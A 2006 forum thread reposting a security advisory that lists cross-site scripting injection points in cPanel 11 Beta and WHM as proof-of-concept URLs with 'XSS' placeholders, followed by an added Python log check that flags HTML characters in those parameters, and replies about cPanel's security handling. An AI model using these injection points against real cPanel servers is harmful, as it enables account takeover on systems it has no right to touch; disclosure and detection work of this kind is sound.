
CPanel 11 Beta Multiple Cross-Site Scripting

Discussion in 'General Discussion' started by ehostcoua, Nov 29, 2006.

  1. ehostcoua

    ehostcoua Registered

    #Aria-Security Team Advisory
    #<www.Aria-security.Com For English >
    #<www.Aria-Security.net For Persian >
    #-----------------------------------------------------------
    #Software: CPanel
    #Tested On CPanel 11 Beta
    #Poc:
    #
    http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
    http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS
    http://target:2082/frontend/x/files/createdir.html?dir=XSS
    http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss
    http://target:2082/frontend/x/err/erredit.html?dir=XSS
    http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
    http://target:2082/frontend/x/files/createfile.html?dir=XSS
    #
    #P.S : Attacker must be authenticated
    #
    #Contact: Advisory@aria-security.net




    #Aria-Security Team Advisory
    #<www.Aria-security.Com For English >
    #<www.Aria-Security.net For Persian >
    #Original Advisory:
    #http://www.aria-security.com/forum/showthread.php?t=44
    #-----------------------------------------------------------
    #Software: WebHost Manager (WHM)
    #Tested WHM X v3.1.0 (demo.cpanel.net)
    #Poc:
    #
    http://target:2086/scripts2/dochangeemail?user=demo&domain=demo.com&email=XSS
    http://target:2086/cgi/addon_config...layusersubject=1&type=redirect&supporturl=XSS
    http://target:2086/scripts/editpkg?pkg=XSS
    http://target:2086/scripts2/domts2?domain=XSS
    http://target:2086/scripts/editzone?domain=XSS
    http://target:2086/scripts2/dofeaturemanager?action=addfeature&feature=XSS
    http://target:2086/scripts/park?domain=demo.com&ndomain=XSS
    #
    #P.S : Attacker must be authenticated
    #
    #Contact: Advisory@aria-security.net
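
Added example, not part of the original post and not cPanel's code: a log check an administrator could run to find requests in which the parameters the advisory marks with `XSS` carry HTML metacharacters. The combined log format and the sample lines are constructed assumptions, and the truncated `addon_config` URL is left out.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint -> parameters the advisory marks with "XSS" (ports 2082 and 2086).
# The addon_config URL is truncated in the post, so it is not listed here.
REPORTED = {
    "/frontend/x/files/fileop.html": {"fileop"},
    "/frontend/x/files/editit.html": {"file"},
    "/frontend/x/files/createdir.html": {"dir"},
    "/frontend/x/htaccess/dohtaccess.html": {"dir"},
    "/frontend/x/err/erredit.html": {"dir", "file"},
    "/frontend/x/files/createfile.html": {"dir"},
    "/scripts2/dochangeemail": {"email"},
    "/scripts/editpkg": {"pkg"},
    "/scripts2/domts2": {"domain"},
    "/scripts/editzone": {"domain"},
    "/scripts2/dofeaturemanager": {"feature"},
    "/scripts/park": {"ndomain"},
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>\"']")  # characters that must not reach HTML unescaped

def suspicious_hits(lines):
    """Return (line_no, path, param, decoded_value) for reported params carrying markup."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a request line in the assumed format
        url = urlsplit(m.group(1))
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        for name in sorted(REPORTED.get(url.path, ())):
            for value in params.get(name, []):
                if MARKUP.search(value):
                    hits.append((no, url.path, name, value))
    return hits

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE = [
    '192.0.2.10 - demo [29/Nov/2006:10:00:01 -0600] "GET /frontend/x/files/createdir.html?dir=/home/demo/public_html HTTP/1.1" 200 5120',
    '192.0.2.10 - demo [29/Nov/2006:10:00:07 -0600] "GET /frontend/x/files/createdir.html?dir=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5233',
    '192.0.2.11 - root [29/Nov/2006:10:02:40 -0600] "GET /scripts/park?domain=demo.com&ndomain=%22%3E%3Ci%3Ex HTTP/1.1" 200 4410',
    '192.0.2.11 - root [29/Nov/2006:10:03:02 -0600] "GET /scripts/editzone?domain=demo.com HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    for hit in suspicious_hits(SAMPLE):
        print(hit)
```

A hit is a lead for review, not proof: directory or file names containing a quote character will also match.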
     
  2. MN-Robert

    MN-Robert Well-Known Member

    It doesn't surprise me, security has gone out the window with cpanel.
     
  3. carluk

    carluk Well-Known Member

    It's in edge at the moment as far as I can see. These problems are being fixed when reported (see change log) although worrying that they are there in the first place. Security is an especially high priority at cpanel given the recent problems according to a recent post by a cpanel guy on WHT - give that what authority you will.

    It should also be noted that people in glass houses should not throw stones. :)
     
  4. cPanelDavidG

    cPanelDavidG Technical Product Specialist

    Security is a top priority here at cPanel and I would encourage anyone who stumbles across any security issues (not just XSS vulnerabilities) to submit them to security@cpanel.net

    In defense of the development team, I do know that they frequently look at and act upon reports from those particular websites. It is also important to note that cPanel 11 is not yet intended for production systems. If it was, we would be pushing the update out via Layer2 to upgrade everyone automatically (who has cPanel automatic update enabled).

    It's better to be sterilizing cPanel 11 of security flaws now than when it hits production environments.
     